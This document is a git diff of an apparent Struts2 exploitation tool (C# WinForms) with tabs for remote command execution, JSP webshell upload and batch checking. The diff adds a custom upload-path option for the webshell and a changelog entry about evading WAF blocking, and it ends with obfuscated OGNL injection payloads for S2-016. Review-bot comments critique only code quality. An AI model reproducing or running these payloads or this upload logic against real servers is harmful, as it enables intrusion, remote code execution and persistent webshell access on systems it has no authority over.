diff --git a/.gitattributes b/.gitattributes
deleted file mode 100644
index dfe0770..0000000
--- a/.gitattributes
+++ /dev/null
@@ -1,2 +0,0 @@
-# Auto detect text files and perform LF normalization
-* text=auto
diff --git a/.vs/Test/v15/.suo b/.vs/Test/v15/.suo
index 9912f55..1b50d15 100644
Binary files a/.vs/Test/v15/.suo and b/.vs/Test/v15/.suo differ
diff --git a/.vs/Test/v15/Server/sqlite3/storage.ide b/.vs/Test/v15/Server/sqlite3/storage.ide
index 2a61484..a2cc604 100644
Binary files a/.vs/Test/v15/Server/sqlite3/storage.ide and b/.vs/Test/v15/Server/sqlite3/storage.ide differ
diff --git a/.vs/Test/v15/Server/sqlite3/storage.ide-shm b/.vs/Test/v15/Server/sqlite3/storage.ide-shm
index 7c19a36..4056e67 100644
Binary files a/.vs/Test/v15/Server/sqlite3/storage.ide-shm and b/.vs/Test/v15/Server/sqlite3/storage.ide-shm differ
diff --git a/.vs/Test/v15/Server/sqlite3/storage.ide-wal b/.vs/Test/v15/Server/sqlite3/storage.ide-wal
index 4f566e6..0a18771 100644
Binary files a/.vs/Test/v15/Server/sqlite3/storage.ide-wal and b/.vs/Test/v15/Server/sqlite3/storage.ide-wal differ
diff --git a/Test/Main.Designer.cs b/Test/Main.Designer.cs
index e43cb80..301938e 100644
--- a/Test/Main.Designer.cs
+++ b/Test/Main.Designer.cs
@@ -49,7 +49,6 @@ private void InitializeComponent()
this.label3 = new System.Windows.Forms.Label();
this.txt_shellPath = new System.Windows.Forms.TextBox();
this.txt_shellName = new System.Windows.Forms.TextBox();
- this.label4 = new System.Windows.Forms.Label();
this.btn_upload = new System.Windows.Forms.Button();
this.txt_shellContent = new System.Windows.Forms.TextBox();
this.tabPage5 = new System.Windows.Forms.TabPage();
@@ -104,6 +103,7 @@ private void InitializeComponent()
this.splitContainer_top = new System.Windows.Forms.SplitContainer();
this.statusStrip1 = new System.Windows.Forms.StatusStrip();
this.lbl_info = new System.Windows.Forms.ToolStripStatusLabel();
+ this.setUploudPath = new System.Windows.Forms.CheckBox();
this.tabControl1.SuspendLayout();
this.tabPage1.SuspendLayout();
this.tabPage2.SuspendLayout();
@@ -196,7 +196,7 @@ private void InitializeComponent()
this.tabPage2.Location = new System.Drawing.Point(4, 22);
this.tabPage2.Name = "tabPage2";
this.tabPage2.Padding = new System.Windows.Forms.Padding(3);
- this.tabPage2.Size = new System.Drawing.Size(789, 434);
+ this.tabPage2.Size = new System.Drawing.Size(789, 425);
this.tabPage2.TabIndex = 1;
this.tabPage2.Text = "命令执行";
this.tabPage2.UseVisualStyleBackColor = true;
@@ -216,8 +216,8 @@ private void InitializeComponent()
// splitContainer_CMD.Panel2
//
this.splitContainer_CMD.Panel2.Controls.Add(this.txt_cmdResult);
- this.splitContainer_CMD.Size = new System.Drawing.Size(783, 428);
- this.splitContainer_CMD.SplitterDistance = 59;
+ this.splitContainer_CMD.Size = new System.Drawing.Size(783, 419);
+ this.splitContainer_CMD.SplitterDistance = 57;
this.splitContainer_CMD.TabIndex = 13;
//
// groupBox1
@@ -229,7 +229,7 @@ private void InitializeComponent()
this.groupBox1.Dock = System.Windows.Forms.DockStyle.Fill;
this.groupBox1.Location = new System.Drawing.Point(0, 0);
this.groupBox1.Name = "groupBox1";
- this.groupBox1.Size = new System.Drawing.Size(783, 59);
+ this.groupBox1.Size = new System.Drawing.Size(783, 57);
this.groupBox1.TabIndex = 13;
this.groupBox1.TabStop = false;
//
@@ -292,7 +292,7 @@ private void InitializeComponent()
this.txt_cmdResult.Multiline = true;
this.txt_cmdResult.Name = "txt_cmdResult";
this.txt_cmdResult.ScrollBars = System.Windows.Forms.ScrollBars.Vertical;
- this.txt_cmdResult.Size = new System.Drawing.Size(783, 365);
+ this.txt_cmdResult.Size = new System.Drawing.Size(783, 358);
this.txt_cmdResult.TabIndex = 5;
this.txt_cmdResult.Text = "注:执行window的cmd建议输入:cmd /c 命令 这种格式,因为cmd /c执行完会关闭进程\r\n如:cmd /c ipconfig /all\r\n少数情况下" +
"可能执行命令不能成功....";
@@ -304,7 +304,7 @@ private void InitializeComponent()
this.tabPage3.Location = new System.Drawing.Point(4, 22);
this.tabPage3.Name = "tabPage3";
this.tabPage3.Padding = new System.Windows.Forms.Padding(3);
- this.tabPage3.Size = new System.Drawing.Size(789, 434);
+ this.tabPage3.Size = new System.Drawing.Size(789, 425);
this.tabPage3.TabIndex = 2;
this.tabPage3.Text = "文件上传";
this.tabPage3.UseVisualStyleBackColor = true;
@@ -323,21 +323,21 @@ private void InitializeComponent()
// splitContainer_uploadFile.Panel2
//
this.splitContainer_uploadFile.Panel2.Controls.Add(this.txt_shellContent);
- this.splitContainer_uploadFile.Size = new System.Drawing.Size(783, 428);
- this.splitContainer_uploadFile.SplitterDistance = 58;
+ this.splitContainer_uploadFile.Size = new System.Drawing.Size(783, 419);
+ this.splitContainer_uploadFile.SplitterDistance = 56;
this.splitContainer_uploadFile.TabIndex = 11;
//
// groupBox2
//
+ this.groupBox2.Controls.Add(this.setUploudPath);
this.groupBox2.Controls.Add(this.label3);
this.groupBox2.Controls.Add(this.txt_shellPath);
this.groupBox2.Controls.Add(this.txt_shellName);
- this.groupBox2.Controls.Add(this.label4);
this.groupBox2.Controls.Add(this.btn_upload);
this.groupBox2.Dock = System.Windows.Forms.DockStyle.Fill;
this.groupBox2.Location = new System.Drawing.Point(0, 0);
this.groupBox2.Name = "groupBox2";
- this.groupBox2.Size = new System.Drawing.Size(783, 58);
+ this.groupBox2.Size = new System.Drawing.Size(783, 56);
this.groupBox2.TabIndex = 0;
this.groupBox2.TabStop = false;
//
@@ -352,9 +352,10 @@ private void InitializeComponent()
//
// txt_shellPath
//
- this.txt_shellPath.Location = new System.Drawing.Point(111, 20);
+ this.txt_shellPath.Enabled = false;
+ this.txt_shellPath.Location = new System.Drawing.Point(143, 20);
this.txt_shellPath.Name = "txt_shellPath";
- this.txt_shellPath.Size = new System.Drawing.Size(297, 21);
+ this.txt_shellPath.Size = new System.Drawing.Size(265, 21);
this.txt_shellPath.TabIndex = 10;
this.txt_shellPath.Text = "如:/home/web/shell.jsp";
//
@@ -366,15 +367,6 @@ private void InitializeComponent()
this.txt_shellName.TabIndex = 2;
this.txt_shellName.Text = "bak.jsp";
//
- // label4
- //
- this.label4.AutoSize = true;
- this.label4.Location = new System.Drawing.Point(28, 23);
- this.label4.Name = "label4";
- this.label4.Size = new System.Drawing.Size(77, 12);
- this.label4.TabIndex = 9;
- this.label4.Text = "自定义路径:";
- //
// btn_upload
//
this.btn_upload.Location = new System.Drawing.Point(689, 18);
@@ -393,7 +385,7 @@ private void InitializeComponent()
this.txt_shellContent.Multiline = true;
this.txt_shellContent.Name = "txt_shellContent";
this.txt_shellContent.ScrollBars = System.Windows.Forms.ScrollBars.Vertical;
- this.txt_shellContent.Size = new System.Drawing.Size(783, 366);
+ this.txt_shellContent.Size = new System.Drawing.Size(783, 359);
this.txt_shellContent.TabIndex = 8;
this.txt_shellContent.Text = resources.GetString("txt_shellContent.Text");
this.txt_shellContent.KeyDown += new System.Windows.Forms.KeyEventHandler(this.txt_shellContent_KeyDown);
@@ -404,7 +396,7 @@ private void InitializeComponent()
this.tabPage5.Location = new System.Drawing.Point(4, 22);
this.tabPage5.Name = "tabPage5";
this.tabPage5.Padding = new System.Windows.Forms.Padding(3);
- this.tabPage5.Size = new System.Drawing.Size(789, 434);
+ this.tabPage5.Size = new System.Drawing.Size(789, 425);
this.tabPage5.TabIndex = 4;
this.tabPage5.Text = "批量验证";
this.tabPage5.UseVisualStyleBackColor = true;
@@ -423,8 +415,8 @@ private void InitializeComponent()
// splitContainer_batchCheck.Panel2
//
this.splitContainer_batchCheck.Panel2.Controls.Add(this.bt_lvw);
- this.splitContainer_batchCheck.Size = new System.Drawing.Size(783, 428);
- this.splitContainer_batchCheck.SplitterDistance = 94;
+ this.splitContainer_batchCheck.Size = new System.Drawing.Size(783, 419);
+ this.splitContainer_batchCheck.SplitterDistance = 92;
this.splitContainer_batchCheck.TabIndex = 30;
//
// groupBox4
@@ -452,7 +444,7 @@ private void InitializeComponent()
this.groupBox4.Dock = System.Windows.Forms.DockStyle.Fill;
this.groupBox4.Location = new System.Drawing.Point(0, 0);
this.groupBox4.Name = "groupBox4";
- this.groupBox4.Size = new System.Drawing.Size(783, 94);
+ this.groupBox4.Size = new System.Drawing.Size(783, 92);
this.groupBox4.TabIndex = 0;
this.groupBox4.TabStop = false;
//
@@ -665,10 +657,11 @@ private void InitializeComponent()
this.bt_lvw.ContextMenuStrip = this.contextMenuStrip1;
this.bt_lvw.Dock = System.Windows.Forms.DockStyle.Fill;
this.bt_lvw.FullRowSelect = true;
+ this.bt_lvw.GridLines = true;
this.bt_lvw.HideSelection = false;
this.bt_lvw.Location = new System.Drawing.Point(0, 0);
this.bt_lvw.Name = "bt_lvw";
- this.bt_lvw.Size = new System.Drawing.Size(783, 330);
+ this.bt_lvw.Size = new System.Drawing.Size(783, 323);
this.bt_lvw.TabIndex = 0;
this.bt_lvw.UseCompatibleStateImageBehavior = false;
this.bt_lvw.View = System.Windows.Forms.View.Details;
@@ -945,6 +938,17 @@ private void InitializeComponent()
this.lbl_info.Name = "lbl_info";
this.lbl_info.Size = new System.Drawing.Size(0, 17);
//
+ // setUploudPath
+ //
+ this.setUploudPath.AutoSize = true;
+ this.setUploudPath.Location = new System.Drawing.Point(23, 25);
+ this.setUploudPath.Name = "setUploudPath";
+ this.setUploudPath.Size = new System.Drawing.Size(108, 16);
+ this.setUploudPath.TabIndex = 11;
+ this.setUploudPath.Text = "自定义上传目录";
+ this.setUploudPath.UseVisualStyleBackColor = true;
+ this.setUploudPath.CheckStateChanged += new System.EventHandler(this.setUploudPath_CheckStateChanged);
+ //
// Main
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
@@ -955,7 +959,7 @@ private void InitializeComponent()
this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedSingle;
this.Name = "Main";
this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
- this.Text = "Struts2漏洞检查工具2018版 V2.1 by shack2 20190617";
+ this.Text = "Struts2漏洞检查工具2019版 V2.2 by shack2 20190925";
this.FormClosing += new System.Windows.Forms.FormClosingEventHandler(this.Main_FormClosing);
this.Shown += new System.EventHandler(this.Main_Shown);
this.tabControl1.ResumeLayout(false);
@@ -1017,7 +1021,6 @@ private void InitializeComponent()
private System.Windows.Forms.TextBox txt_shellName;
private System.Windows.Forms.TextBox txt_shellContent;
private System.Windows.Forms.TextBox txt_shellPath;
- private System.Windows.Forms.Label label4;
private System.Windows.Forms.TextBox txt_cmdResult;
private System.Windows.Forms.Button btn_startCmd;
private System.Windows.Forms.Label label5;
@@ -1078,6 +1081,7 @@ private void InitializeComponent()
private System.Windows.Forms.Label label14;
private System.Windows.Forms.StatusStrip statusStrip1;
private System.Windows.Forms.ToolStripStatusLabel lbl_info;
+ private System.Windows.Forms.CheckBox setUploudPath;
}
}
diff --git a/Test/Main.cs b/Test/Main.cs
index 92584b9..ea290b4 100644
--- a/Test/Main.cs
+++ b/Test/Main.cs
@@ -113,6 +113,7 @@ public String request(String method, String url, String data, String exp, String
{
request.Method = "POST";
request.ContentType = "multipart/form-data";
+ request.AddMuHeader("\"" + data + "\"", "x");
}
else
{
@@ -138,10 +139,6 @@ public String request(String method, String url, String data, String exp, String
request.ContentType = exp;
}
- else {
-
- request.AddMuHeader("\"" + data + "\"", "x");
- }
String body = request.GetBody(data);
request.Body = body;
@@ -321,7 +318,7 @@ public void getVerinfo()
else if (!vul.Equals("S2-045") && !vul.Equals("S2-046"))
{
- result = Tools.getContent(request(method, url, "", bp.Get_Exp_VerInfo("os.name"), cookie, vul), vul) + "\r\n";
+ result = Tools.getContent(request(method, url, bp.Get_Exp_VerInfo("os.name"),"" , cookie, vul), vul) + "\r\n";
result += Tools.getContent(request(method, url, bp.Get_Exp_VerInfo("os.version"), "", cookie, vul), vul) + "\r\n";
result += Tools.getContent(request(method, url, bp.Get_Exp_Path(), "", cookie, vul), vul) + "\r\n";
}
@@ -441,7 +438,7 @@ public void executeBatchCmd(Object url)
this.btn_exeBatchCMD.Enabled = true;
}
- public static int version = 20190617;
+ public static int version = 20190925;
public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=Struts2VulsTools&NO=" + URLEncode.UrlEncode(Tools.getSystemSid()) + "&VERSION=" + version;
//检查更新
public void checkUpdate()
@@ -534,11 +531,22 @@ public void uploadFile()
String url = this.txt_url.Text;
String cookie = this.txt_cookie.Text;
String result = Tools.getContent(uploadFile(url,shellPath, shellName,cookie,this.com_vul.Text), this.com_vul.Text);
-
+ String path = "";
+ String pathfilename = "";
if (result.IndexOf("okokok") != -1)
{
- MessageBox.Show("上传成功----" + getFilePath(url, result, shellName));
- LogError("上传访问路径:" + getFilePath(url, result, shellName));
+ if (this.setUploudPath.Checked&& !"".Equals(shellPath))
+ {
+
+ path = shellPath;
+ pathfilename = shellPath + shellName;
+ }
+ else {
+ pathfilename = getFilePath(url, result, shellName);
+ }
+ MessageBox.Show("上传成功----" + pathfilename);
+
+ LogError("上传访问路径:" + pathfilename);
}
else {
LogError("上传失败!");
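Review bot: `path` is assigned on the new line `path = shellPath;` but never read anywhere in the hunk, so it is a dead local unless something below the hunk uses it; drop `String path = "";` and that assignment if nothing does. The new guard `if (this.setUploudPath.Checked&& !"".Equals(shellPath))` also drops the old exclusion of the designer placeholder text, so if the box is ticked while `txt_shellPath` still shows `如:/home/web/shell.jsp` that placeholder is accepted as the upload path — the same guard appears in the `uploadFile(url, shellPath, …)` hunk at `@@ -568`, so both should be fixed together (presumably `shellPath` is read from `txt_shellPath.Text` above the hunk). Separately, `pathfilename = shellPath + shellName;` joins without a separator while `Get_Exp_Upload` in S2016.cs joins with `path+"/"+fileName`, so the path shown in the message box and log can differ from the one actually used. uploadFile() begins before the hunk and continues after it.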
@@ -554,7 +562,7 @@ public String getFilePath(String url,String result,String fileName) {
if (c != -1)
{
String cpath = result.Substring(c);
- return rootPath + cpath.Replace("okokok","")+ "/"+ fileName;
+ return rootPath + result.Replace("okokok","")+ "/"+ fileName;
}
else {
return "未获取到shell路径,请人工访问。";
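Review bot: `cpath` is now computed by `String cpath = result.Substring(c);` but never used, because the changed return line reads `result.Replace("okokok","")` instead of `cpath.Replace(...)`; as written, whatever precedes index `c` in `result` is carried into the returned path, which looks like the opposite of what the `IndexOf`/`Substring` pair was for. Either restore `cpath` in the return or delete the `Substring` line so the intent is not ambiguous to the next reader. `c` and `rootPath` are defined above the hunk, so their meaning is inferred from the names here; getFilePath continues outside the hunk.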
@@ -568,9 +576,8 @@ public String uploadFile(String url,String shellPath,String shellName,String coo
String fileContent = this.txt_shellContent.Text;
String fileContent_encode = System.Web.HttpUtility.UrlEncode(fileContent, Encoding.UTF8);
String path = "";
- if (!"如:/home/web/shell.jsp".Equals(shellPath) && !"".Equals(shellPath))
+ if (this.setUploudPath.Checked && !"".Equals(shellPath))
{
-
path = shellPath;
}
BasePayload bp = getPayload(vulName);
@@ -1077,5 +1084,17 @@ private void com_vul_TextChanged(object sender, EventArgs e)
MessageBox.Show("S2-045,S2-046不支持复杂数据类型提交!");
}
}
+
+ private void setUploudPath_CheckStateChanged(object sender, EventArgs e)
+ {
+ if (this.setUploudPath.Checked)
+ {
+ this.txt_shellPath.Enabled = true;
+ }
+ else
+ {
+ this.txt_shellPath.Enabled = false;
+ }
+ }
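Review bot: The new `setUploudPath_CheckStateChanged` handler is an if/else that only mirrors a boolean, so it reads more clearly as the single line `this.txt_shellPath.Enabled = this.setUploudPath.Checked;`. The control name carries the typo `Uploud` (wired up in Main.Designer.cs as well, while the new `isSetUploadPath` field in Config.cs spells it differently); renaming it now, while it is new, stops the inconsistency spreading. The file still ends without a trailing newline.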
}
}
\ No newline at end of file
diff --git a/Test/Main.resx b/Test/Main.resx
index 63dea51..88f3e04 100644
--- a/Test/Main.resx
+++ b/Test/Main.resx
@@ -118,7 +118,9 @@
System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
- 2018-08-24:
+ 2019-09-25:
+优化部分EXP在部分情况下被WAF拦截的问题,提高检测成功率,优化自定义上传路径exp,文件所在目录不存在时自动创建目录,防止文件因为目录不存在,导致上传失败。
+2018-08-24:
增加S2-057 Struts 2.3 to 2.3.34,Struts 2.5 to 2.5.16 此漏洞影响范围非常小,要求配置条件比较苛刻,同时,一些特定版本没有看到有沙盒绕过,所以,目前exp只是基于S2-045改写的,所以exp并不是所有版本都能用,正常情况下Struts 2.3.5-2.3.31,Struts 2.5-2.5.10版本可以使用此exp。
2017-07-07:
增加S2-048 Struts 2.3.X 支持检查官方示例struts2-showcase应用的代码执行漏洞,参考地址:http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action
diff --git a/Test/Properties/AssemblyInfo.cs b/Test/Properties/AssemblyInfo.cs
index 1f010a9..fceff8d 100644
--- a/Test/Properties/AssemblyInfo.cs
+++ b/Test/Properties/AssemblyInfo.cs
@@ -10,7 +10,7 @@
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Microsoft")]
[assembly: AssemblyProduct("Test")]
-[assembly: AssemblyCopyright("Copyright © Microsoft 2017")]
+[assembly: AssemblyCopyright("Copyright © Microsoft 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
@@ -32,5 +32,5 @@
// 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
// 方法是按如下所示使用“*”:
// [assembly: AssemblyVersion("1.0.*")]
-[assembly: AssemblyVersion("1.8.0.0")]
-[assembly: AssemblyFileVersion("1.8.0.0")]
+[assembly: AssemblyVersion("2.2.0.0")]
+[assembly: AssemblyFileVersion("2.2.0.0")]
diff --git a/Test/bin/Debug/Test.exe b/Test/bin/Debug/Test.exe
new file mode 100644
index 0000000..ff40bd7
Binary files /dev/null and b/Test/bin/Debug/Test.exe differ
diff --git a/Test/bin/Debug/Test.pdb b/Test/bin/Debug/Test.pdb
new file mode 100644
index 0000000..ac7aa94
Binary files /dev/null and b/Test/bin/Debug/Test.pdb differ
diff --git a/Test/bin/Debug/Test.vshost.exe b/Test/bin/Debug/Test.vshost.exe
new file mode 100644
index 0000000..681ab77
Binary files /dev/null and b/Test/bin/Debug/Test.vshost.exe differ
diff --git a/Test/bin/Debug/Test.vshost.exe.manifest b/Test/bin/Debug/Test.vshost.exe.manifest
new file mode 100644
index 0000000..061c9ca
--- /dev/null
+++ b/Test/bin/Debug/Test.vshost.exe.manifest
@@ -0,0 +1,11 @@
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Test/bin/Debug/cmd.txt b/Test/bin/Debug/cmd.txt
new file mode 100644
index 0000000..0700152
--- /dev/null
+++ b/Test/bin/Debug/cmd.txt
@@ -0,0 +1 @@
+whoami
\ No newline at end of file
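Review bot: This commit adds build output and IDE state to the repository — `Test/bin/Debug/*` and `Test/bin/Release/*` (`Test.exe`, `Test.pdb`, `Test.vshost.exe`), the `Test/obj/**` caches and the `.vs/**` SQLite store — alongside this `cmd.txt` data file. Compiled binaries cannot be reviewed against the source they are supposed to match, and the `*.FileListAbsolute.txt` entries embed the author's local absolute paths (`F:\MyCoding\...`). A `.gitignore` covering `bin/`, `obj/` and `.vs/` would keep these out; the deletion of `.gitattributes` at the top of the diff also removes the `* text=auto` LF normalization, which I would keep.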
diff --git a/Test/bin/Release/Test.exe b/Test/bin/Release/Test.exe
new file mode 100644
index 0000000..61ec033
Binary files /dev/null and b/Test/bin/Release/Test.exe differ
diff --git a/Test/bin/Release/Test.exe.config b/Test/bin/Release/Test.exe.config
new file mode 100644
index 0000000..e365603
--- /dev/null
+++ b/Test/bin/Release/Test.exe.config
@@ -0,0 +1,3 @@
+
+
+
diff --git a/Test/bin/Release/Test.pdb b/Test/bin/Release/Test.pdb
new file mode 100644
index 0000000..ac5a575
Binary files /dev/null and b/Test/bin/Release/Test.pdb differ
diff --git a/Test/bin/Release/Test.vshost.exe b/Test/bin/Release/Test.vshost.exe
new file mode 100644
index 0000000..8f90da4
Binary files /dev/null and b/Test/bin/Release/Test.vshost.exe differ
diff --git a/Test/bin/Release/Test.vshost.exe.config b/Test/bin/Release/Test.vshost.exe.config
new file mode 100644
index 0000000..e365603
--- /dev/null
+++ b/Test/bin/Release/Test.vshost.exe.config
@@ -0,0 +1,3 @@
+
+
+
diff --git a/Test/http/model/Config.cs b/Test/http/model/Config.cs
index b9cd038..eb221be 100644
--- a/Test/http/model/Config.cs
+++ b/Test/http/model/Config.cs
@@ -15,5 +15,6 @@ public class Config
public String FileContent = "";
public Boolean isExeCMD = false;
public Boolean isUpFile = false;
+ public Boolean isSetUploadPath = false;
}
}
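Review bot: `isSetUploadPath` is added to `Config` but nothing else in this diff reads or writes it — Main.cs consults `this.setUploudPath.Checked` directly in both upload paths — so unless a caller outside the diff uses it, the field is dead and should be dropped or actually wired in. Its spelling (`Upload`) also differs from the checkbox it mirrors (`setUploudPath`); pick one. Like the neighbouring fields it is a public mutable `Boolean`; a property would match the usual C# guidance, but that is at least consistent with the existing file.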
diff --git a/Test/http/model/HttpRequest.cs b/Test/http/model/HttpRequest.cs
index 7518b22..8fe2fb0 100644
--- a/Test/http/model/HttpRequest.cs
+++ b/Test/http/model/HttpRequest.cs
@@ -105,20 +105,18 @@ public String GetBody(String data)
sb.Append("Cookie: " + Cookie + "\r\n");
}
sb.Append("\r\n");
-
- if (!"".Equals(data))
- {
- sb.Append(data);
- }
-
- else if (MUData.Count > 0)
+ if (MUData.Count > 0)
{
foreach (var c in this.MUData)
- {
- sb.Append("-----------------------------7e116d19044c\r\nContent-Disposition: form-data; name=" + c.Key+"\r\n\r\n" + c.Value+ "\r\n");
- }
+ {
+ sb.Append("-----------------------------7e116d19044c\r\nContent-Disposition: form-data; name=" + c.Key + "\r\n\r\n" + c.Value + "\r\n");
+ }
sb.Append("-----------------------------7e116d19044c--");
- }
+ }
+ else if (!"".Equals(data))
+ {
+ sb.Append(data);
+ }
return sb.ToString();
}
diff --git a/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache b/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache
index 3265a2f..809c7a9 100644
Binary files a/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache and b/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache differ
diff --git a/Test/obj/Debug/Test.Main.resources b/Test/obj/Debug/Test.Main.resources
index 8c95bce..0b82cff 100644
Binary files a/Test/obj/Debug/Test.Main.resources and b/Test/obj/Debug/Test.Main.resources differ
diff --git a/Test/obj/Debug/Test.csproj.FileListAbsolute.txt b/Test/obj/Debug/Test.csproj.FileListAbsolute.txt
index d889620..dd1b2e3 100644
--- a/Test/obj/Debug/Test.csproj.FileListAbsolute.txt
+++ b/Test/obj/Debug/Test.csproj.FileListAbsolute.txt
@@ -128,3 +128,12 @@ F:\MyCoding\c#\projects\struts2018\Test\obj\Debug\Test.csproj.GenerateResource.c
F:\MyCoding\c#\projects\struts2018\Test\obj\Debug\Test.csproj.CoreCompileInputs.cache
F:\MyCoding\c#\projects\struts2018\Test\obj\Debug\Test.exe
F:\MyCoding\c#\projects\struts2018\Test\obj\Debug\Test.pdb
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\bin\Debug\Test.exe
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\bin\Debug\Test.pdb
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.csprojAssemblyReference.cache
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.Main.resources
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.Properties.Resources.resources
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.csproj.GenerateResource.cache
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.csproj.CoreCompileInputs.cache
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.exe
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.pdb
diff --git a/Test/obj/Debug/Test.csproj.GenerateResource.cache b/Test/obj/Debug/Test.csproj.GenerateResource.cache
index 85a5e1d..9ce96f6 100644
Binary files a/Test/obj/Debug/Test.csproj.GenerateResource.cache and b/Test/obj/Debug/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/Debug/Test.exe b/Test/obj/Debug/Test.exe
index 37c53a6..ff40bd7 100644
Binary files a/Test/obj/Debug/Test.exe and b/Test/obj/Debug/Test.exe differ
diff --git a/Test/obj/Debug/Test.pdb b/Test/obj/Debug/Test.pdb
index 0dc193c..ac7aa94 100644
Binary files a/Test/obj/Debug/Test.pdb and b/Test/obj/Debug/Test.pdb differ
diff --git a/Test/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/Test/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
index f2fde64..416db39 100644
Binary files a/Test/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache and b/Test/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/Test/obj/Release/Test.Main.resources b/Test/obj/Release/Test.Main.resources
index 34675a2..0b82cff 100644
Binary files a/Test/obj/Release/Test.Main.resources and b/Test/obj/Release/Test.Main.resources differ
diff --git a/Test/obj/Release/Test.csproj.CoreCompileInputs.cache b/Test/obj/Release/Test.csproj.CoreCompileInputs.cache
new file mode 100644
index 0000000..afdb463
--- /dev/null
+++ b/Test/obj/Release/Test.csproj.CoreCompileInputs.cache
@@ -0,0 +1 @@
+f77e91520dcb262a2b0d25ae4f8ed7ad9eeafb4f
diff --git a/Test/obj/Release/Test.csproj.FileListAbsolute.txt b/Test/obj/Release/Test.csproj.FileListAbsolute.txt
index 0518da7..0fba272 100644
--- a/Test/obj/Release/Test.csproj.FileListAbsolute.txt
+++ b/Test/obj/Release/Test.csproj.FileListAbsolute.txt
@@ -16,3 +16,12 @@ F:\MyCoding\c#\projects\struts2017\Test\obj\Release\Test.Main.resources
F:\MyCoding\c#\projects\struts2017\Test\obj\Release\Test.Properties.Resources.resources
F:\MyCoding\c#\projects\struts2017\Test\obj\Release\Test.csproj.GenerateResource.Cache
F:\MyCoding\c#\projects\struts2017\Test\bin\Release\SmartThreadPool.dll
+F:\MyCoding\c#\projects\struts2018\Test\bin\Release\Test.exe
+F:\MyCoding\c#\projects\struts2018\Test\bin\Release\Test.pdb
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.Main.resources
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.Properties.Resources.resources
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.csproj.GenerateResource.cache
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.csproj.CoreCompileInputs.cache
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.exe
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.pdb
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.csprojAssemblyReference.cache
diff --git a/Test/obj/Release/Test.csproj.GenerateResource.Cache b/Test/obj/Release/Test.csproj.GenerateResource.Cache
index 1ea1926..e823d83 100644
Binary files a/Test/obj/Release/Test.csproj.GenerateResource.Cache and b/Test/obj/Release/Test.csproj.GenerateResource.Cache differ
diff --git a/Test/obj/Release/Test.csprojAssemblyReference.cache b/Test/obj/Release/Test.csprojAssemblyReference.cache
new file mode 100644
index 0000000..28570a9
Binary files /dev/null and b/Test/obj/Release/Test.csprojAssemblyReference.cache differ
diff --git a/Test/obj/Release/Test.exe b/Test/obj/Release/Test.exe
index 524bebb..61ec033 100644
Binary files a/Test/obj/Release/Test.exe and b/Test/obj/Release/Test.exe differ
diff --git a/Test/obj/Release/Test.pdb b/Test/obj/Release/Test.pdb
index 5bf649f..ac5a575 100644
Binary files a/Test/obj/Release/Test.pdb and b/Test/obj/Release/Test.pdb differ
diff --git a/Test/payload/S2016.cs b/Test/payload/S2016.cs
index 2cee517..8d796a4 100644
--- a/Test/payload/S2016.cs
+++ b/Test/payload/S2016.cs
@@ -6,12 +6,26 @@ namespace payload
{
public class S2016 : BasePayload
{
- private String Exp_Check = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22struts2_security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()}";
- private String Exp_VerInfo = "redirect:${%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22[vername]:%22),%23resp.getWriter().print(@java.lang.System@getProperty(%22[vername]%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}";
